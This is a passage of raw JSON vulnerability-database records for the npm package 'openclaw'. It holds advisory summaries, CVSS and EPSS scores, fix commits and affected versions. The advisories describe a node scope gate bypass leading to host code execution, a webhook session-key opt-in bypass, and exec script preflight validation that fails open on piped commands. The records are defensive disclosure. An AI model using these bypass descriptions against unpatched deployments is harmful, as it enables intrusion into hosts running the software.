qhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-68v4-hmwv-f43h"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xz8s-hj5s-wfgj"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89532?format=json","vulnerability_id":"VCID-xzg5-ren5-p7gw","summary":"OpenClaw: Device-Paired Node Skips Node Scope Gate → Host RCE.md\n## Summary\nDevice-Paired Node Skips Node Scope Gate → Host RCE.md\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real in shipped v2026.3.28 because a merely device-paired node could expose node commands without node pairing, but high is sufficient given the pairing/setup prerequisites.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `3886b65ef21d02808c1a106fa1f9f69e22f71c32` — 2026-03-30T17:29:28+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41352","reference_id":"","reference_type":"","scores":[{"value":"0.00536","scoring_system":"epss","scoring_elements":"0.67865","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00536","scoring_system":"epss","scoring_elements":"0.67876","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00536","scoring_system":"epss","scoring_elements":"0.67869","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41352"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/3886b65ef21d02808c1a106fa1f9f69e22f71c32","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T16:36:03Z/"}],"url":"https://github.com/openclaw/openclaw/commit/3886b65ef21d02808c1a106fa1f9f69e22f71c32"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xj9w-5r6q-x6v4","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T16:36:03Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xj9w-5r6q-x6v4"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41352","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41352"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-remote-code-execution-via-node-scope-gate-bypass","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T16:36:03Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-remote-code-execution-via-node-scope-gate-bypass"},{"reference_url":"https://github.com/advisories/GHSA-xj9w-5r6q-x6v4","reference_id":"GHSA-xj9w-5r6q-x6v4","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xj9w-5r6q-x6v4"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41352","GHSA-xj9w-5r6q-x6v4"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xzg5-ren5-p7gw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89941?format=json","vulnerability_id":"VCID-y65g-4baa-a7c2","summary":"OpenClaw: Hook mapping templates could bypass hook session-key opt-in\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nTemplated hook mapping `sessionKey` values were treated differently from request-supplied session keys. A hook mapping could render an externally influenced session key even when `hooks.allowRequestSessionKey` was disabled, bypassing the intended routing opt-in for hook callers.\n\nThis affects webhook routing isolation. It does not grant host execution by itself. Severity is medium.\n\n## Fix\n\nTemplate-rendered mapping session keys are now treated as externally supplied routing input and require `hooks.allowRequestSessionKey=true` plus the existing prefix policy checks.\n\nFix commit:\n\n- `5275d008ed33203dba3f98e969ad683a65c416c3`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-45002","reference_id":"","reference_type":"","scores":[{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10694","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10682","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10719","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-45002"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5275d008ed33203dba3f98e969ad683a65c416c3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:46:08Z/"}],"url":"https://github.com/openclaw/openclaw/commit/5275d008ed33203dba3f98e969ad683a65c416c3"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2xcp-x87w-q377","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:46:08Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-2xcp-x87w-q377"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45002","reference_id":"","reference_type":"","scores":[{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-45002"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-hook-session-key-bypass-via-template-mapping","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:46:08Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-hook-session-key-bypass-via-template-mapping"},{"reference_url":"https://github.com/advisories/GHSA-2xcp-x87w-q377","reference_id":"GHSA-2xcp-x87w-q377","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-2xcp-x87w-q377"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109923?format=json","purl":"pkg:npm/openclaw@2026.4.20","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"}],"aliases":["CVE-2026-45002","GHSA-2xcp-x87w-q377"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-y65g-4baa-a7c2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89035?format=json","vulnerability_id":"VCID-y7sd-j9xn-qffs","summary":"OpenClaw's complex interpreter pipelines could skip exec script preflight validation\n## Summary\n\nBefore OpenClaw 2026.4.2, exec script preflight validation could fail open on complex interpreter invocations such as pipes or other non-simple command forms. In those cases, script-content validation could be skipped entirely.\n\n## Impact\n\nAn attacker-controlled command shape could bypass the intended preflight validation for script execution. This weakened a defense-in-depth guard that was meant to block unsafe script content before execution.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513` — close the fail-open bypass in exec script preflight\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @iskindar for reporting, and thanks @wsparks-vc for coordination.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34425","reference_id":"","reference_type":"","scores":[{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06326","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.0631","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00022","scoring_system":"epss","scoring_elements":"0.06316","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-34425"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T13:00:24Z/"}],"url":"https://github.com/openclaw/openclaw/commit/8aceaf5d0f0ec552b75a792f7f0a3bfa5b091513"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T13:00:24Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-fvx6-pj3r-5q4q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34425","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-34425"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass","reference_id":"","reference_type":"","scores":[{"value":"5.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-03T13:00:24Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-shell-bleed-protection-preflight-validation-bypass"},{"reference_url":"https://github.com/advisories/GHSA-fvx6-pj3r-5q4q","reference_id":"GHSA-fvx6-pj3r-5q4q","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fvx6-pj3r-5q4q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109939?format=json","purl":"pkg:npm/openclaw@2026.4.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vul